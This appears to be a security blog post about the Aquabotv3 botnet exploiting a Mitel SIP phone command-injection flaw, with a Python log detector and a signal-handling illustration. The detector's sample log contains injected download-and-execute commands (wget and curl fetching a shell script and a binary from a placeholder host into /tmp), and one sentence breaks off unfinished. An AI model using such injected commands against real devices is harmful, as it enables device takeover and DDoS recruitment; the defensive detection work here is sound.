2025-01-28
In recent months, a notable development in botnet evolution has emerged. Akamai’s Security Intelligence and Response Team (SIRT) has uncovered a new and significantly more capable version of the Aquabot malware. This latest iteration, dubbed “Aquabotv3,” exploits a command-injection vulnerability in Mitel SIP phones and adds features its predecessors lacked. Here’s a breakdown of the growing threat.
Summary:
Akamai's SIRT has discovered the third version of Aquabot, a botnet built on the Mirai code base, which is now targeting Mitel SIP phones. The primary attack vector is CVE-2024-41710, a command-injection vulnerability in the Mitel 6800, 6900, and 6900w series SIP phones running unpatched firmware. The flaw lets an attacker who can authenticate to the phone's web interface (in practice, one who knows the default or a weak administrator password) inject arbitrary commands through a crafted HTTP POST request.
The vulnerability was disclosed in mid-2024 and a public proof of concept followed in August 2024; Akamai observed exploitation attempts in the wild beginning in January 2025. The attackers use the injected command to fetch a shell script that in turn downloads and executes the Aquabot binary. While earlier versions of Aquabot closely followed the Mirai botnet's playbook, version 3 introduces new capabilities, notably a “report_kill” function: when the bot process receives a termination signal, it sends a message to its command-and-control (C2) server before exiting, which suggests the operators want to monitor the health of the botnet and learn when bots are being cleaned up.
In addition to Mitel SIP phones, Aquabotv3 exploits vulnerabilities in Hadoop YARN and Linksys routers, which broadens the pool of devices it can recruit for DDoS attacks. Alarmingly, the botnet has been marketed as a “DDoS-as-a-service” on Telegram, where it is advertised as a DDoS testing tool to give it an appearance of legitimacy.
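The dropper pattern described above (a POST whose form field carries shell metacharacters followed by a download-and-execute sequence) is what a defender can actually look for in front of the phones. The following Python detector is an added example written for this page; it is not code from Akamai's report or from the Aquabot samples. It assumes a reverse proxy or WAF in front of the phones' web interface logs the URL-encoded POST body as a final quoted field (ordinary access logs do not log bodies); the log lines, the `/config.html` endpoint name and the IP addresses are constructed placeholders, and the indicators are the generic Mirai-style dropper pattern rather than a signature for CVE-2024-41710 specifically.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample (not real traffic): combined-log-style lines with the
# URL-encoded POST body appended as a final quoted field. /config.html and the
# addresses are placeholders, not the vulnerable Mitel endpoint.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Jan/2025:03:14:07 +0000] "POST /config.html HTTP/1.1" 200 512 "mode=1&host=phone01"
203.0.113.5 - - [08/Jan/2025:03:14:09 +0000] "POST /config.html HTTP/1.1" 200 0 "mode=1&host=x%3Bwget+http%3A%2F%2F203.0.113.5%2Fbin.sh+-O+%2Ftmp%2Fbin.sh%3Bchmod+777+%2Ftmp%2Fbin.sh%3B%2Ftmp%2Fbin.sh"
198.51.100.9 - - [08/Jan/2025:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-"
203.0.113.5 - - [08/Jan/2025:03:15:02 +0000] "POST /config.html HTTP/1.1" 200 0 "mode=1&host=x%60curl+http%3A%2F%2F203.0.113.5%2Fhttpd.x86+-o+%2Ftmp%2Fhttpd.x86%60"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<body>.*)"$'
)

# Metacharacters that turn a form field value into a second shell command.
SHELL_META = re.compile(r'[;|`\n]|\$\(|&&|\|\|')
# Fetch tools typical of Mirai-style droppers, and hints that the file is then run.
DOWNLOADERS = ("wget", "curl", "tftp", "busybox")
EXEC_HINTS = ("chmod", "/tmp/", "/var/tmp/", "/dev/shm/", ".sh")
# Mirai-family payloads are conventionally named <something>.<arch>, e.g. httpd.x86.
ARCH_BINARY = re.compile(r'\b\w+\.(x86_64|x86|arm\d*|mips\w*|ppc|sh4|m68k|spc)\b')


def classify_body(body):
    """Decode a URL-encoded body and list the dropper indicators it contains."""
    decoded = unquote_plus(body)
    indicators = []
    if SHELL_META.search(decoded):
        indicators.append("shell-metachar")
    for tool in DOWNLOADERS:
        if re.search(r'\b' + tool + r'\b', decoded):
            indicators.append(tool)
    if any(hint in decoded for hint in EXEC_HINTS):
        indicators.append("exec-hint")
    match = ARCH_BINARY.search(decoded)
    if match:
        indicators.append("arch-binary:" + match.group(0))
    return decoded, indicators


def is_dropper(indicators):
    """Injection metacharacters plus either a fetch tool or an execution hint."""
    has_meta = "shell-metachar" in indicators
    has_fetch = any(i in DOWNLOADERS for i in indicators)
    has_exec = "exec-hint" in indicators or any(i.startswith("arch-binary:") for i in indicators)
    return has_meta and (has_fetch or has_exec)


def scan_http_log(text):
    """Return one finding per POST whose body looks like a Mirai-style dropper."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST" or m.group("body") == "-":
            continue
        decoded, indicators = classify_body(m.group("body"))
        if is_dropper(indicators):
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "path": m.group("path"),
                "indicators": indicators,
                "decoded": decoded,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_http_log(SAMPLE_LOG):
        print(finding["line"], finding["ip"], finding["indicators"])
```

Run against the sample, the two injected requests from 203.0.113.5 are flagged and the benign POST and GET are not. The decision rule deliberately requires both a metacharacter and a fetch or execute hint so that a hostname field containing a stray semicolon does not page anyone on its own; the decoded body is kept in the finding so an analyst can read the injected command as the device would have seen it.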
What Undercode Says:
The emergence of Aquabotv3 signals a worrying evolution of Mirai-based botnets, which are becoming not only more capable but also more targeted in their choice of victims. Mirai variants have been a major concern since 2016, and this new version brings several developments worth noting.
One of the most notable features of Aquabotv3 is its “report_kill” functionality. When the bot process receives a termination signal, it reports that fact to its C2 server before dying. That tells the operator which devices are being cleaned up, and could allow them to re-infect those devices quickly or adjust their tactics to avoid detection and disruption. This kind of self-monitoring has not been seen in earlier versions of the malware, making it a more resilient threat. One caveat for responders: a handler like this can only intercept catchable signals such as SIGTERM; a SIGKILL still terminates the process without giving it a chance to phone home, and blocking the device's outbound traffic before cleanup prevents any report from reaching the operator.
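To make the “report_kill” mechanism concrete, here is an added Python illustration of how a process can intercept termination signals and record a report before they take effect. It is written for this page and is not Aquabot's code; the list that stands in for the C2 channel and the choice of intercepted signals are assumptions for the demonstration. It also shows the practical limit of the technique: SIGKILL cannot be caught, so it produces no report.

```python
import os
import signal
import time

# Offline stand-in for the bot's C2 channel (assumption for the demo): a real
# bot would write the report to its C2 socket; here it goes into a list.
REPORTS = []

# Termination signals a process can intercept from userland. SIGKILL and
# SIGSTOP are deliberately absent: the kernel never hands them to a handler.
CATCHABLE = (signal.SIGTERM, signal.SIGINT, signal.SIGHUP)


def report_kill(signum, frame):
    """Handler in the style of a 'report_kill' routine: record which signal
    arrived and swallow it so the process keeps running."""
    REPORTS.append("kill:" + signal.Signals(signum).name)


def install_report_kill():
    """Register report_kill for every catchable termination signal and return
    the previous handlers so they can be restored afterwards."""
    return {sig: signal.signal(sig, report_kill) for sig in CATCHABLE}


def restore_handlers(previous):
    for sig, handler in previous.items():
        signal.signal(sig, handler if handler is not None else signal.SIG_DFL)


def can_be_caught(sig):
    """True if a userland handler can be installed for sig, i.e. the process
    would get a chance to phone home before dying."""
    try:
        old = signal.signal(sig, signal.SIG_DFL)
    except (OSError, ValueError):
        return False  # SIGKILL/SIGSTOP: the kernel refuses to install a handler
    signal.signal(sig, old if old is not None else signal.SIG_DFL)
    return True


def demo(sig=signal.SIGTERM):
    """Install the handlers, send sig to ourselves (what a plain `kill <pid>`
    does for SIGTERM) and return what would have been reported to the C2."""
    REPORTS.clear()
    previous = install_report_kill()
    try:
        os.kill(os.getpid(), sig)
        # Python runs the handler in the main thread shortly after delivery.
        for _ in range(200):
            if REPORTS:
                break
            time.sleep(0.005)
    finally:
        restore_handlers(previous)
    return list(REPORTS)


if __name__ == "__main__":
    print(demo())                                                       # ['kill:SIGTERM']
    print(can_be_caught(signal.SIGTERM), can_be_caught(signal.SIGKILL))  # True False
```

The demo sends SIGTERM to its own process and returns `['kill:SIGTERM']`, while `can_be_caught(signal.SIGKILL)` returns `False` because the kernel rejects the handler installation. Read from the defender's side, this is why an incident-response playbook for a bot that reports termination should cut the device's egress to the C2 first and then use SIGKILL or a power cycle, rather than a polite SIGTERM that the bot can announce.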
Additionally, the malware takes steps to blend in: the dropped binary is named “httpd.x86” so that it passes for a web server process in a casual process listing. Because different samples talk to their C2 servers on different ports, blocking a single port is not enough; defenders should alert on any outbound connection from a phone to an unexpected destination rather than relying on port-based rules. This adds a layer of work for defenders who are trying to stop the botnet before a compromised device is put to use.
The broader attack surface of Aquabotv3 is another reason for concern. While SIP phones are the headline target, the malware also exploits other vulnerable devices, such as Linksys routers and Hadoop YARN systems. This wider reach significantly enhances the botnet's ability to launch distributed denial-of-service (DDoS) attacks, potentially overwhelming targets with the combined bandwidth of a large and varied pool of compromised devices.
Another disturbing aspect is the commercialization of the malware. By marketing the botnet as a “DDoS-as-a-service” on platforms like Telegram, the operators offer a cheap and accessible way for others to carry out large-scale DDoS attacks. This lowers the barrier to entry and allows even people with limited technical expertise to launch damaging attacks.
For organizations, especially those relying on Mitel SIP phones or other IoT devices, the key takeaway is clear: patch management is critical. The exploitation of CVE-2024-41710 is a reminder of how crucial it is to update firmware promptly when a fix is released. In addition, because exploitation requires access to the phone's administrative interface, changing default credentials, restricting that interface to a management network, and monitoring the phones' outbound traffic for unexpected connections are essential steps in defending against this threat.
The broader implications of
In conclusion, Aquabotv3's emergence highlights the persistent and growing threat posed by Mirai-based botnets. As these malicious networks evolve with new features and more sophisticated capabilities, businesses and individuals alike must prioritize basic security hygiene to keep their devices out of them.
References:
Reported By: Cyberpress.org